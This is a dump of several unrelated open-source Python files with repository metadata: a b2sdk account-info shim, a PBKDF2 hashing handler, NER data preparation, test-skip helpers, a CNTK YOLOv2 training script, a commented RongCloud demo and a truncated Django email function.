self._set_auth_data(
account_id=account_id,
auth_token=auth_token,
api_url=api_url,
download_url=download_url,
minimum_part_size=minimum_part_size,
application_key=application_key,
realm=realm,
allowed=allowed,
application_key_id=application_key_id,
**s3_kwargs,
)
# translate legacy "minimum_part_size" to new style "recommended_part_size"
class MinimumPartSizeTranslator:
def _set_auth_data(
self,
account_id,
auth_token,
api_url,
download_url,
minimum_part_size,
application_key,
realm,
s3_api_url=None,
allowed=None,
application_key_id=None
):
if 's3_api_url' in inspect.getfullargspec(super()._set_auth_data).args:
s3_kwargs = dict(s3_api_url=s3_api_url)
else:
s3_kwargs = {}
return super()._set_auth_data(
account_id=account_id,
auth_token=auth_token,
api_url=api_url,
download_url=download_url,
recommended_part_size=minimum_part_size,
absolute_minimum_part_size=DEFAULT_ABSOLUTE_MINIMUM_PART_SIZE,
application_key=application_key,
realm=realm,
allowed=allowed,
application_key_id=application_key_id,
**s3_kwargs,
)
def get_minimum_part_size(self):
return self.get_recommended_part_size()
class AbstractAccountInfo(OldAccountInfoMethods, v2.AbstractAccountInfo):
def get_s3_api_url(self):
"""
Return s3_api_url or raises MissingAccountData exception.
:rtype: str
"""
# Removed @abstractmethod decorators
def get_bucket_name_or_none_from_bucket_id(self, bucket_id: str) -> Optional[str]:
"""
Look up the bucket name for the given bucket id.
"""
# Removed @abstractmethod decorator
def get_recommended_part_size(self):
"""
Return the recommended number of bytes in a part of a large file.
:return: number of bytes
:rtype: int
"""
# Removed @abstractmethod decorator
def get_absolute_minimum_part_size(self):
"""
Return the absolute minimum number of bytes in a part of a large file.
:return: number of bytes
:rtype: int
"""
# Removed @abstractmethod decorator
@abstractmethod
def get_minimum_part_size(self):
"""
Return the minimum number of bytes in a part of a large file.
:return: number of bytes
:rtype: int
"""
# This stays abstract in v1
@abstractmethod
def _set_auth_data(
self, account_id, auth_token, api_url, download_url, minimum_part_size, application_key,
realm, s3_api_url, allowed, application_key_id
):
"""
Actually store the auth data. Can assume that 'allowed' is present and valid.
All of the information returned by ``b2_authorize_account`` is saved, because all of it is
needed at some point.
"""
# Keep the old signature
class InMemoryAccountInfo(MinimumPartSizeTranslator, OldAccountInfoMethods, v2.InMemoryAccountInfo):
pass
class UrlPoolAccountInfo(OldAccountInfoMethods, v2.UrlPoolAccountInfo):
pass
class SqliteAccountInfo(MinimumPartSizeTranslator, OldAccountInfoMethods, v2.SqliteAccountInfo):
def __init__(self, file_name=None, last_upgrade_to_run=None):
"""
If ``file_name`` argument is empty or ``None``, path from ``B2_ACCOUNT_INFO`` environment variable is used. If that is not available, a default of ``~/.b2_account_info`` is used.
:param str file_name: The sqlite file to use; overrides the default.
:param int last_upgrade_to_run: For testing only, override the auto-update on the db.
"""
# use legacy env var resolution, XDG not supported
file_name = file_name or os.environ.get(
v2.B2_ACCOUNT_INFO_ENV_VAR, v2.B2_ACCOUNT_INFO_DEFAULT_FILE
)
super().__init__(file_name=file_name, last_upgrade_to_run=last_upgrade_to_run)
class StubAccountInfo(MinimumPartSizeTranslator, OldAccountInfoMethods, v2.StubAccountInfo):
REALM_URLS = {'production': 'http://production.example.com'}
| 30.523316
| 186
| 0.636904
| 5,127
| 0.870311
| 0
| 0
| 1,873
| 0.317943
| 0
| 0
| 2,019
| 0.342726
|
c42ddcb403bc1b33c57898bd141f1f505a69b04f
| 9,539
|
py
|
Python
|
src/pyrin/security/hashing/handlers/pbkdf2.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/security/hashing/handlers/pbkdf2.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/security/hashing/handlers/pbkdf2.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
pbkdf2 hashing handler module.
"""
import hashlib
import re
import pyrin.configuration.services as config_services
import pyrin.security.utils.services as security_utils_services
from pyrin.security.hashing.decorators import hashing
from pyrin.security.hashing.handlers.base import HashingBase
from pyrin.security.hashing.handlers.exceptions import InvalidHashingRoundsCountError, \
InvalidPBKDF2InternalAlgorithmError, InvalidHashingSaltLengthError
@hashing()
class PBKDF2Hashing(HashingBase):
"""
pbkdf2 hashing class.
"""
# regular expression to validate format of full hashed values.
# the following format will be matched:
# `$handler_name$internal_algorithm$rounds$salt_length$salt-text_plus_salt_hash`
FORMAT_REGEX = re.compile(r'^\$PBKDF2\$[^$]+\$[\d]+\$[\d]+\$(.+)$')
def __init__(self, **options):
"""
initializes an instance of PBKDF2Hashing.
"""
super().__init__(**options)
def _generate_hash(self, text, **options):
"""
gets the hash of input text using a random or specified salt.
:param str text: text to be hashed.
:keyword bytes salt: salt to be used for hashing.
if not provided, a random salt will be generated
considering `salt_length` option.
:keyword str internal_algorithm: internal algorithm to be used
for hashing. if not provided,
default value from relevant
config will be used.
:keyword int rounds: rounds to perform for generating hash.
if not provided, default value from
relevant config will be used.
:keyword int salt_length: salt length to be used for hashing.
if `salt` option is provided, then
this value will be ignored.
if not provided, default value from
relevant config will be used.
:rtype: bytes
"""
internal_algorithm, rounds, salt_length = self._extract_attributes(**options)
self._validate_attributes(internal_algorithm, rounds, salt_length)
salt = options.get('salt', None)
if salt is None:
salt = self._generate_salt(length=salt_length)
text_hash = hashlib.pbkdf2_hmac(internal_algorithm,
text.encode(self._encoding),
salt,
rounds)
return self._make_final_hash(internal_algorithm, rounds, salt, text_hash)
def _generate_salt(self, **options):
"""
generates a valid salt for this handler and returns it.
:keyword int length: length of generated salt in bytes.
if not provided, default value from
relevant config will be used.
:rtype: bytes
"""
salt_length = options.get('length', config_services.get('security', 'hashing',
'pbkdf2_salt_length'))
return security_utils_services.get_bytes(length=salt_length)
def _is_match(self, text, hashed_value, **options):
"""
gets a value indicating that given text's
hash is identical to given hashed value.
:param str text: text to be hashed.
:param bytes hashed_value: hashed value to compare with.
:rtype: bool
"""
internal_algorithm, rounds, salt, text_hash = \
self._extract_parts_from_final_hash(hashed_value, **options)
new_full_hashed_value = self._generate_hash(text,
internal_algorithm=internal_algorithm,
rounds=rounds, salt=salt)
return hashed_value == new_full_hashed_value
def _get_algorithm(self, **options):
"""
gets the hashing algorithm.
:rtype: str
"""
return 'PBKDF2'
def _get_separator_count(self):
"""
gets the separator count used between parts of this handler's hashed result.
:rtype: int
"""
return 5
def _extract_attributes(self, **options):
"""
extracts the required attributes for this handler from input
keyword arguments. if not available, gets the default
values from relevant configs.
:keyword str internal_algorithm: internal algorithm to be used
for hashing. if not provided,
default value from relevant
config will be used.
:keyword int rounds: rounds to perform for generating hash.
if not provided, default value from
relevant config will be used.
:keyword int salt_length: salt length to be used for hashing.
if not provided, default value from
relevant config will be used.
:returns: tuple[str internal_algorithm, int rounds, int salt_length]
:rtype: tuple[str, int, int]
"""
internal_algorithm = options.get('internal_algorithm',
config_services.get('security', 'hashing',
'pbkdf2_internal_algorithm'))
rounds = options.get('rounds', config_services.get('security', 'hashing',
'pbkdf2_rounds'))
salt_length = options.get('salt_length', config_services.get('security', 'hashing',
'pbkdf2_salt_length'))
return internal_algorithm, rounds, salt_length
def _validate_attributes(self, internal_algorithm, rounds, salt_length):
"""
validates the given inputs for hash generation.
it will raise an error on invalid inputs.
:param str internal_algorithm: internal algorithm to be used for hashing.
:param int rounds: rounds to perform for generating hash.
:param int salt_length: salt length to be used for hashing.
:raises InvalidPBKDF2InternalAlgorithmError: invalid pbkdf2 internal algorithm error.
:raises InvalidHashingRoundsCountError: invalid hashing rounds count error.
:raises InvalidHashingSaltLengthError: invalid hashing salt length error.
"""
if internal_algorithm not in hashlib.algorithms_guaranteed:
raise InvalidPBKDF2InternalAlgorithmError('Internal algorithm [{algorithm}] '
'is invalid.'
.format(algorithm=internal_algorithm))
if rounds < 1:
raise InvalidHashingRoundsCountError('Hashing rounds [{rounds}] is invalid.'
.format(rounds=rounds))
if salt_length < 1:
raise InvalidHashingSaltLengthError('Salt length [{length}] is invalid.'
.format(length=salt_length))
def _make_final_hash(self, internal_algorithm, rounds, salt, text_hash):
"""
makes final hash from input values and returns it.
:param str internal_algorithm: internal algorithm to be used for hashing.
:param int rounds: rounds to perform for generating hash.
:param bytes salt: salt to be used for hashing.
:param bytes text_hash: hash value of text and salt.
:rtype: bytes
"""
return self._get_separator() + self._get_separator().join(
(self._get_algorithm().encode(self._encoding),
internal_algorithm.encode(self._encoding),
str(rounds).encode(self._encoding),
str(len(salt)).encode(self._encoding),
self._encode_hash_part(salt + text_hash)))
def _extract_parts_from_final_hash(self, full_hashed_value, **options):
"""
extracts different parts of given full hashed value.
:param bytes full_hashed_value: full hashed value to extract it's parts.
:returns: tuple[str internal_algorithm, int rounds, bytes salt, bytes text_hash]
:rtype: tuple[str, int, bytes, bytes]
"""
empty, handler, internal_algorithm, rounds, salt_length, salt_plus_text_hash = \
full_hashed_value.split(self._get_separator(), self._get_separator_count())
salt_length = int(salt_length)
raw_salt_plus_text_hash = self._decode_hash_part(salt_plus_text_hash)
salt = raw_salt_plus_text_hash[:salt_length]
text_hash = raw_salt_plus_text_hash[salt_length:]
return internal_algorithm.decode(self._encoding), int(rounds), salt, text_hash
def _get_hashed_part(self, full_hashed_value, **options):
"""
gets the hashed part from full hashed value which current handler understands it.
this handler returns the same input value as result.
:param bytes full_hashed_value: full hashed value to get hashed part from it.
:rtype: bytes
"""
return full_hashed_value
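# Editor's sketch (not part of the original handler): the core primitive this class wraps
# is hashlib.pbkdf2_hmac. The algorithm, salt length and iteration count below are
# illustrative values, not pyrin's configured defaults.
if __name__ == '__main__':
    import os as _os
    _salt = _os.urandom(16)
    _digest = hashlib.pbkdf2_hmac('sha256', b'secret-text', _salt, 100000)
    print(len(_salt), len(_digest))  # 16-byte salt, 32-byte SHA-256 derived key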
| 39.094262
| 93
| 0.588636
| 9,040
| 0.947688
| 0
| 0
| 9,051
| 0.948842
| 0
| 0
| 5,117
| 0.536429
|
c42e18634a20b6733cded46ea5994450f7ae4da0
| 8,652
|
py
|
Python
|
src/steps/prepare_ner_data.py
|
allanwright/media-classifier
|
a0da0799cc0bd6ef7360012c362f9fab273286c6
|
[
"MIT"
] | 2
|
2019-08-16T00:49:27.000Z
|
2021-08-15T16:37:45.000Z
|
src/steps/prepare_ner_data.py
|
allanwright/media-classifier
|
a0da0799cc0bd6ef7360012c362f9fab273286c6
|
[
"MIT"
] | 1
|
2020-02-19T10:17:56.000Z
|
2020-07-26T09:42:49.000Z
|
src/steps/prepare_ner_data.py
|
allanwright/media-classifier
|
a0da0799cc0bd6ef7360012c362f9fab273286c6
|
[
"MIT"
] | 1
|
2019-06-27T10:57:07.000Z
|
2019-06-27T10:57:07.000Z
|
'''Defines a pipeline step which prepares training and test data for
named entity recognition.
'''
import ast
import json
import pickle
from mccore import EntityRecognizer
from mccore import ner
from mccore import persistence
import pandas as pd
from sklearn.utils import resample
from src.step import Step
class PrepareNerData(Step):
'''Defines a pipeline step which prepares training and test data for
named entity recognition.
'''
def __init__(self):
super(PrepareNerData, self).__init__()
self.input = {
'processed': 'data/interim/processed.csv',
'ner_labelled_csv': 'data/interim/ner_labelled.csv',
}
self.output = {
'stacked': 'data/interim/stacked.csv',
'ner_labelled_tsv': 'data/interim/ner_labelled.tsv',
'ner_labelled_json': 'data/interim/ner_labelled.json',
'ner_labelled_pickle': 'data/processed/ner_labelled.pickle',
}
def run(self):
'''Runs the pipeline step.
'''
# Process data for named entity recognition labelling
self.__process_data_for_ner()
# Process labelled named entity recognition data (if any)
self.__process_labelled_ner_data()
def __process_data_for_ner(self):
df = pd.read_csv(self.input['processed'])
self.print('Processing data for named entity recognition ({rows} rows)', rows=df.shape[0])
# Drop anything other than movies and tv shows
categories = [1, 2]
df = df[df['category'].isin(categories)]
# Drop subtitle files
df.drop(df[df['ext'] == 'srt'].index, inplace=True)
# Drop anything that contains unwanted words
blacklist = [
'tamilrockers',
'www',
'hindi',
'Ã',
'ita',
'french',
'spa',
'torrent9',
'torrentcounter',
'ssrmovies',
'rus',
'bengali',
]
def contains_blacklisted_word(name):
for word in name.split():
if word in blacklist:
return True
return False
df['blacklisted'] = df['name'].apply(contains_blacklisted_word)
df.drop(df[df['blacklisted']].index, inplace=True)
# Downsample to a number of files that is reasonable enough for
# human verification of the labels provided by the ner model
self.print('Downsampling dataset ({rows} rows)', rows=df.shape[0])
categories = [df[df.category == c] for c in df.category.unique()]
downsampled = [resample(c,
replace=False,
n_samples=250,
random_state=123) for c in categories]
df = pd.concat(downsampled)
df['entities'] = ''
nlp, _ = ner.get_model()
nlp_bytes = persistence.bin_to_obj('models/ner_mdl.pickle')
nlp.from_bytes(nlp_bytes)
recognizer = EntityRecognizer(nlp)
def get_entities(name):
return str(list(recognizer.predict(name)))
df['entities'] = df['name'].apply(get_entities)
# Split the filename into individual words then stack the DataFrame
self.print('Stacking dataset ({rows} rows)', rows=df.shape[0])
index = [df.index, df.name, df.category, df.entities]
df = pd.DataFrame(df['name'].str.split().tolist(), index=index).stack()
df = df.reset_index()
df.columns = ['index', 'name', 'category', 'entities', 'pos', 'word']
# Add entity column
df['entity'] = ''
def get_entity(row):
entities = ast.literal_eval(row['entities'])
word = row['word'].upper()
for i in entities:
if word in (str(s).upper() for s in str(i[1]).split()):
return i[0]
return ''
df['entity'] = df.apply(get_entity, axis=1)
df.drop(columns=['category', 'entities'], inplace=True)
# Save interim stacked output before processing further
df.to_csv(self.output['stacked'], index=False)
def __process_labelled_ner_data(self):
df = pd.read_csv(self.input['ner_labelled_csv'])
# Keep only word and corresponding label
df = df[['word', 'entity']]
# Save to tsv
df.to_csv(
self.output['ner_labelled_tsv'],
sep='\t',
header=False,
index=False)
# Convert from tsv to json
self.__tsv_to_json_format(
self.output['ner_labelled_tsv'],
self.output['ner_labelled_json'],
'na')
# Write out spacy file
self.__write_spacy_file(
self.output['ner_labelled_json'],
self.output['ner_labelled_pickle'])
def __tsv_to_json_format(self, input_path, output_path, unknown_label):
try:
input_file = open(input_path, 'r') # input file
output_file = open(output_path, 'w') # output file
data_dict = {}
annotations = []
label_dict = {}
words = ''
start = 0
for line in input_file:
word, entity = line.split('\t')
words += word + " "
entity = entity[:len(entity)-1]
if entity != unknown_label:
if len(entity) != 1:
d = {}
d['text'] = word
d['start'] = start
d['end'] = start+len(word) - 1
try:
label_dict[entity].append(d)
                        except KeyError:
label_dict[entity] = []
label_dict[entity].append(d)
start += len(word) + 1
if entity == 'extension':
data_dict['content'] = words
words = ''
label_list = []
for ents in list(label_dict.keys()):
for i in range(len(label_dict[ents])):
if label_dict[ents][i]['text'] != '':
l = [ents, label_dict[ents][i]]
for j in range(i + 1, len(label_dict[ents])):
if label_dict[ents][i]['text'] == label_dict[ents][j]['text']:
di = {}
di['start'] = label_dict[ents][j]['start']
di['end'] = label_dict[ents][j]['end']
di['text'] = label_dict[ents][i]['text']
l.append(di)
label_dict[ents][j]['text'] = ''
label_list.append(l)
for entities in label_list:
label = {}
label['label'] = [entities[0]]
label['points'] = entities[1:]
annotations.append(label)
data_dict['annotation'] = annotations
annotations = []
json.dump(data_dict, output_file)
output_file.write('\n')
data_dict = {}
start = 0
label_dict = {}
except Exception as e:
print("Unable to process file" + "\n" + "error = " + str(e))
return None
def __write_spacy_file(self, input_file=None, output_file=None):
try:
training_data = []
lines = []
with open(input_file, 'r') as f:
lines = f.readlines()
for line in lines:
data = json.loads(line)
text = data['content']
entities = []
for annotation in data['annotation']:
point = annotation['points'][0]
labels = annotation['label']
if not isinstance(labels, list):
labels = [labels]
for label in labels:
entities.append((point['start'], point['end'] + 1, label))
training_data.append((text, {"entities" : entities}))
with open(output_file, 'wb') as fp:
pickle.dump(training_data, fp)
except Exception as e:
print("Unable to process " + input_file + "\n" + "error = " + str(e))
return None
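# Minimal sketch of the structure __write_spacy_file pickles: a list of
# (text, {"entities": [(start, end, label), ...]}) tuples. The sample filename and
# entity values below are invented purely to illustrate the shape of the data.
import pickle
sample = [
    ("the matrix 1999 1080p mkv",
     {"entities": [(0, 10, "title"), (11, 15, "year"), (22, 25, "extension")]}),
]
with open("ner_sample.pickle", "wb") as fp:
    pickle.dump(sample, fp)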
| 36.05 | 98 | 0.496417 | 8,340 | 0.963828 | 0 | 0 | 0 | 0 | 0 | 0 | 2,014 | 0.232752 |
c42e658ca9b791acfc8cc494fe87a5ee5b2f994f | 1,006 | py | Python | jubakit/test/__init__.py | vishalbelsare/jubakit | f6252ba627ce4e2e42eb9aafaaf05c882bc1c678 | ["MIT"] | 12 | 2016-04-11T04:49:08.000Z | 2019-02-08T01:43:46.000Z | jubakit/test/__init__.py | vishalbelsare/jubakit | f6252ba627ce4e2e42eb9aafaaf05c882bc1c678 | ["MIT"] | 138 | 2016-04-11T05:57:48.000Z | 2020-09-26T03:09:31.000Z | jubakit/test/__init__.py | vishalbelsare/jubakit | f6252ba627ce4e2e42eb9aafaaf05c882bc1c678 | ["MIT"] | 10 | 2016-04-11T03:18:45.000Z | 2018-04-14T10:11:15.000Z |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
__all__ = ['requireSklearn']
from jubakit.compat import PYTHON3
try:
import embedded_jubatus
embedded_available = True
except ImportError:
embedded_available = False
try:
import numpy
import scipy
import sklearn
sklearn_available = True
except ImportError:
sklearn_available = False
try:
from unittest import skipUnless
def requireSklearn(target):
return skipUnless(sklearn_available, 'requires scikit-learn')(target)
def requirePython3(target):
return skipUnless(PYTHON3, 'requires Python 3.x')(target)
def requireEmbedded(target):
return skipUnless(embedded_available, 'requires embedded_jubatus')(target)
except ImportError:
def requireSklearn(target):
return target if sklearn_available else None
def requirePython3(target):
return target if PYTHON3 else None
def requireEmbedded(target):
return target if embedded_available else None
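# Usage sketch (hypothetical test case, not part of jubakit): the decorators above
# skip a test when the optional dependency is missing, or drop it entirely on the
# fallback path without unittest.skipUnless.
from unittest import TestCase
class SklearnBackedTest(TestCase):
    @requireSklearn
    def test_needs_sklearn(self):
        import sklearn  # only reached when scikit-learn is importable
        self.assertTrue(hasattr(sklearn, '__version__'))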
| 26.473684 | 82 | 0.777336 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.109344 |
c42e88219fc65a0c84a4b46fac98f1c167ea84ef | 9,859 | py | Python | YoLo2Net.py | zhouyc2002/yolo2-cntk | 549cb46365d1750031eee90044b6262f9b94ff49 | ["Apache-2.0"] | 3 | 2017-07-27T00:05:39.000Z | 2021-02-25T08:56:10.000Z | YoLo2Net.py | zhouyc2002/yolo2-cntk | 549cb46365d1750031eee90044b6262f9b94ff49 | ["Apache-2.0"] | 1 | 2019-08-05T12:55:06.000Z | 2019-08-06T00:43:58.000Z | YoLo2Net.py | zhouyc2002/yolo2-cntk | 549cb46365d1750031eee90044b6262f9b94ff49 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 28 13:03:05 2017
@author: ZHOU Yuncheng
"""
import cntk as C
import _cntk_py
import cntk.layers
import cntk.initializer
import cntk.losses
import cntk.metrics
import cntk.logging
import cntk.io.transforms as xforms
import cntk.io
import cntk.train
import os
import numpy as np
import yolo2
import CloneModel
# default Paths relative to current python file.
abs_path = os.path.dirname(os.path.abspath(__file__))
model_path = os.path.join(abs_path, "Models")
# model dimensions
image_height = 416
image_width = 416
num_channels = 3 # RGB
num_truth_boxes = 14
box_dim = 5 # centerX, centerY, Width, Height, class_type
num_classes = 3 # object type count, e.g. tomato, flower, stem
num_anchors = 5
model_name = "Yolo2Net.model"
# Create a minibatch source.
def create_image_mb_source(image_file, rois_file, is_training, total_number_of_samples):
if not os.path.exists(image_file):
raise RuntimeError("File '%s' does not exist." %image_file)
if not os.path.exists(rois_file):
raise RuntimeError("File '%s' does not exist." %rois_file)
# transformation pipeline for the features has jitter/crop only when training
transforms = [xforms.scale(width=image_width, height=image_height,
channels=num_channels, interpolations='linear')]
if is_training:
transforms += [
xforms.color(brightness_radius=0.2, contrast_radius=0.2, saturation_radius=0.2)
]
# deserializer
imageReader = cntk.io.ImageDeserializer(image_file,
cntk.io.StreamDefs(
features=cntk.io.StreamDef(field='image', transforms=transforms),
ignored=cntk.io.StreamDef(field='label', shape=1)))
txtReader = cntk.io.CTFDeserializer(rois_file,
cntk.io.StreamDefs(
rois=cntk.io.StreamDef(field='rois',shape=num_truth_boxes*box_dim)))
return cntk.io.MinibatchSource([imageReader, txtReader],
randomize=is_training,
max_samples=total_number_of_samples,
multithreaded_deserializer=True)
# Create the network.
def create_yolo2net(anchor_dims = None):
# Input variables denoting the features and label data
feature_var = C.input_variable((num_channels, image_height, image_width))
label_var = C.input_variable((num_truth_boxes, box_dim))
net = CloneModel.CloneModel('Models/DarkNet.model', 'mean_removed_input', 'bn6e',
cntk.ops.functions.CloneMethod.clone, feature_var)
det1 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad=True,
activation=cntk.ops.leaky_relu,
name='det1')(net)
detbn1 = cntk.layers.BatchNormalization(map_rank=1, name='detbn1')(det1)
det2 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad=True,
activation=cntk.ops.leaky_relu,
name='det2')(detbn1)
detbn2 = cntk.layers.BatchNormalization(map_rank=1, name='detbn2')(det2)
det3 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad = True,
activation=cntk.ops.leaky_relu,
name='det3')(detbn2)
detbn3 = cntk.layers.BatchNormalization(map_rank=1, name='detbn3')(det3)
z = cntk.layers.layers.Convolution2D((1,1), (5+num_classes) * num_anchors,
init=cntk.initializer.normal(0.01), pad = True,
name='output')(detbn3)
# loss and metric
ce = C.user_function(yolo2.Yolo2Error(z, label_var, class_size = num_classes, priors = anchor_dims))
pe = C.user_function(yolo2.Yolo2Metric(z, label_var, class_size = num_classes, priors = anchor_dims,
metricMethod = yolo2.Yolo2MetricMethod.Avg_iou))
cntk.logging.log_number_of_parameters(z) ; print()
return {
'feature': feature_var,
'label': label_var,
'ce' : ce,
'pe' : pe,
'output': z
}
# Create trainer
def create_trainer(network, epoch_size, num_quantization_bits, printer, block_size, warm_up):
# Set learning parameters
lr_per_mb = [0.001]*25 + [0.0001]*25 + [0.00001]*25 + [0.000001]*25 + [0.0000001]
lr_schedule = C.learning_rate_schedule(lr_per_mb, unit=C.learners.UnitType.minibatch, epoch_size=epoch_size)
mm_schedule = C.learners.momentum_schedule(0.9)
l2_reg_weight = 0.0005 # CNTK L2 regularization is per sample, thus same as Caffe
if block_size != None and num_quantization_bits != 32:
raise RuntimeError("Block momentum cannot be used with quantization, please remove quantized_bits option.")
# Create learner
local_learner = C.learners.momentum_sgd(network['output'].parameters, lr_schedule, mm_schedule, unit_gain=False, l2_regularization_weight=l2_reg_weight)
# Since we reuse parameter settings (learning rate, momentum) from Caffe, we set unit_gain to False to ensure consistency
# Create trainer
if block_size != None:
parameter_learner = cntk.train.distributed.block_momentum_distributed_learner(local_learner, block_size=block_size)
else:
parameter_learner = cntk.train.distributed.data_parallel_distributed_learner(local_learner, num_quantization_bits=num_quantization_bits, distributed_after=warm_up)
return C.Trainer(network['output'], (network['ce'], network['pe']), parameter_learner, printer)
# Train and test
def train_and_test(network, trainer, train_source, test_source, minibatch_size, epoch_size, restore):
    # define mapping from input streams to network inputs
input_map = {
network['feature']: train_source.streams.features,
network['label']: train_source.streams.rois
}
# Train all minibatches
cntk.train.training_session(
trainer=trainer, mb_source = train_source,
model_inputs_to_streams = input_map,
mb_size = minibatch_size,
progress_frequency=epoch_size,
checkpoint_config = C.CheckpointConfig(filename=os.path.join(model_path, model_name), restore=restore),
test_config= C.TestConfig(test_source, minibatch_size=minibatch_size)
).train()
# Train and evaluate the network.
def net_train_and_eval(train_data, train_rois, test_data, test_rois,
priors = None,
num_quantization_bits=32,
block_size=3200, warm_up=0,
minibatch_size=1,
epoch_size = 1281167,
max_epochs=1,
restore=True,
log_to_file=None,
num_mbs_per_log=None,
gen_heartbeat=True):
_cntk_py.set_computation_network_trace_level(0)
log_printer = cntk.logging.progress_print.ProgressPrinter(
freq=1,
tag='Training',
log_to_file = os.path.join(model_path, log_to_file),
num_epochs=max_epochs)
progress_printer = cntk.logging.progress_print.ProgressPrinter(freq=1, tag='Training',
num_epochs=max_epochs,test_freq=1)
network = create_yolo2net(priors)
trainer = create_trainer(network, epoch_size, num_quantization_bits,
[progress_printer, log_printer], block_size, warm_up)
train_source = create_image_mb_source(train_data, train_rois, True,
total_number_of_samples=max_epochs * epoch_size)
    test_source = create_image_mb_source(test_data, test_rois, False,
total_number_of_samples=cntk.io.FULL_DATA_SWEEP)
train_and_test(network,
trainer,
train_source,
test_source,
minibatch_size,
epoch_size,
restore)
#
# get train sample size evaluate sample size
#
def get_sample_counts(train_file, test_file):
counts = [0, 0]
if os.path.exists(train_file):
ff = open(train_file)
counts[0] = len(ff.readlines())
ff.close()
if os.path.exists(test_file):
ff = open(test_file)
counts[1] = len(ff.readlines())
ff.close()
return counts
def open_anchor_file(anchor_file):
anchors = []
file = open(anchor_file)
lines = file.readlines()
for line in lines:
if len(line.strip()) > 0:
dims = line.strip().split("\t")
anchors.append([float(dims[0]), float(dims[1])])
file.close()
return np.array(anchors).astype(np.float32)
if __name__=='__main__':
anchor_data = 'anchor.txt'
if not os.path.exists(anchor_data):
raise RuntimeError("File '%s' does not exist." %anchor_data)
anchors = open_anchor_file(anchor_data)
if anchors.shape[0] < num_anchors:
raise RuntimeError("Anchor dimension is less than %s" %num_anchors)
# network = create_yolo2net(anchors)
# cntk.logging.graph.plot(network['output'], 'yolo2.png')
train_data = 'train.txt'
train_rois = 'train.rois.txt'
test_data = 'train.txt'
test_rois = 'train.rois.txt'
sample_size = get_sample_counts(train_data, test_data)
net_train_and_eval(train_data, train_rois, test_data, test_rois,
priors = anchors,
epoch_size=sample_size[0],
block_size = None,
minibatch_size = 32,
max_epochs = 130,
log_to_file = 'Yolo2Net.log')
# Must call MPI finalize when process exit without exceptions
cntk.train.distributed.Communicator.finalize()
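# Sketch of the anchor file format open_anchor_file() expects: one anchor per line,
# width and height separated by a tab. The numbers and the file name below are
# placeholders for illustration, not the anchors used above.
sample_anchor_lines = "1.08\t1.19\n3.42\t4.41\n6.63\t11.38\n9.42\t5.11\n16.62\t10.52\n"
with open('anchor_sample.txt', 'w') as f:
    f.write(sample_anchor_lines)
# open_anchor_file('anchor_sample.txt') then returns a (5, 2) float32 numpy array.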
| 39.436 | 171 | 0.647733 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,602 | 0.162491 |
c42f5f63c17465e80eb4449fa0bfca6ef5e47655 | 948 | py | Python | hqq_tool/rongcloud/demo.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | ["MIT"] | 1 | 2018-09-21T09:42:02.000Z | 2018-09-21T09:42:02.000Z | hqq_tool/rongcloud/demo.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | ["MIT"] | null | null | null | hqq_tool/rongcloud/demo.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
# __author__= "Ruda"
# Date: 2018/10/16
'''
import os
from rongcloud import RongCloud
app_key = os.environ['APP_KEY']
app_secret = os.environ['APP_SECRET']
rcloud = RongCloud(app_key, app_secret)
r = rcloud.User.getToken(userId='userid1', name='username', portraitUri='http://www.rongcloud.cn/images/logo.png')
print(r)
{'token': 'P9YNVZ2cMQwwaADiNDVrtRZKF+J2pVPOWSNlYMA1yA1g49pxjZs58n4FEufsH9XMCHTk6nHR6unQTuRgD8ZS/nlbkcv6ll4x', 'userId': 'userid1', 'code': 200}
r = rcloud.Message.publishPrivate(
fromUserId='userId1',
toUserId={"userId2","userid3","userId4"},
objectName='RC:VcMsg',
content='{"content":"hello","extra":"helloExtra","duration":20}',
pushContent='thisisapush',
pushData='{"pushData":"hello"}',
count='4',
verifyBlacklist='0',
isPersisted='0',
isCounted='0')
print(r)
{'code': 200}
'''
'''
More:
https://github.com/rongcloud/server-sdk-python
'''
| 27.085714 | 143 | 0.679325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 943 | 0.994726 |
c4311123dd5258af551865a612948896d2a1bbc9 | 2,132 | py | Python | registration/email.py | openstack-kr/openinfradays-2018 | 9eb0e284ab95e177dc4acca17d63ccbdaff67fb1 | ["Apache-2.0"] | null | null | null | registration/email.py | openstack-kr/openinfradays-2018 | 9eb0e284ab95e177dc4acca17d63ccbdaff67fb1 | ["Apache-2.0"] | 1 | 2018-06-17T02:21:41.000Z | 2018-06-17T02:21:41.000Z | registration/email.py | openstack-kr/openinfradays-2018 | 9eb0e284ab95e177dc4acca17d63ccbdaff67fb1 | ["Apache-2.0"] | 1 | 2018-05-31T11:39:02.000Z | 2018-05-31T11:39:02.000Z |
from django.core.mail import EmailMessage
from django.conf import settings
def send_email(name, date, email):
txt = """
<html>
<body>
<table cellpadding='0' cellspacing='0' width='100%' border='0'>
<tbody>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
안녕하세요 <span style='color:#3832D8'>{0}</span> 님,
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
